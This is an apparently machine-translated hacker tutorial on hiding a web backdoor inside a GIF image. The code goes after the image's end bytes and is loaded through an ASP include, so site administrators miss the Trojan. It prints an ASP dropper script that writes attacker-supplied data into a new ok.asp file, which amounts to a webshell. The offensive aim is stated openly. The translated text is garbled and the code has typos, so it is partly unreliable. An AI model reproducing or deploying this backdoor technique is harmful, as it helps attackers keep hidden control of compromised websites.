Author: smelly beggar! source:
www.bugkidz.org
It seems that the success rate from the injection of WebShell seems to be higher. After getting the shell, install your own script back door, often killed. The history of the back door of the script: 1. The most beginning is to put a ASP file directly. 2. Put the ASP file encryption. 3. Insert the script into the code. (I often use this) but I was found out, and I manually detected the script security of a station. This site was found to be a roam. So I think of it, how can I not be found to be killed? Finally, I studied if I insert the script into the picture. The script program that is then called in the image in the ASP should be possible. The test was passed. Now I write my heart. Let everyone analyze it. Common progress and improve this method. I saw the Structural documentation of the GIF picture during the study. GIF images are ended at 00 3B. In other words, the 00 3b will not be displayed. So we insert the code behind 00 3B. Of course, the code we encrypt to put it in the picture to get better. I wrote a program to do this. Here you have to say, it will not be displayed behind the 00 3b in the picture. But the code has been run. The picture will also be displayed normally. Test: Add: <% = now%> and add: Then you download this image in an ASP file: time. It is normal because the picture is running in the ASP script running in the code. In other words, if you write a script for generating a file. Then we submit specific parameters to let the code in the picture generate files. This enables our back door. 1: This method to do is to find a GIF image in the target site and then insert the code into the image, and upload it to the site. This makes an administrator very difficult to find the Trojan. I can't think of Trojan in the picture. 2: The code we insert is only one line. It is the include file ..... find the ASP file that is a big bit of a file. Then we submit the URL of the ASP to the ASP to the ASP to complete the work. Script of my inserted picture: <% DIM objfso%> <% DIM fdata%> <% DIM objcountfile%> <% on error resume next%> <% set objfso = server.createObject ("scripting.filesystemObject")%> <% fdata = request ("cyfddata")%> <% if fdata <> "" "> <% syfdpath = server.mappath (Request.ServerVariables (" script_name ") &" / ok.asp "%> < % Set objcountfile = objfso.createtextFile (syfdapth, true)%> <% ObjcountFile.write fdata%> <% end if%> <% ObjcountFile.close%> <% set objcountfile = Nothing%> <% set objfso = nothing% > This code is mainly to generate an ok.asp file in the current directory. The file content is data we submitted. Used with request ("cyfddata"). This code is encrypted and inserted into the picture. Let's post the code of my program.
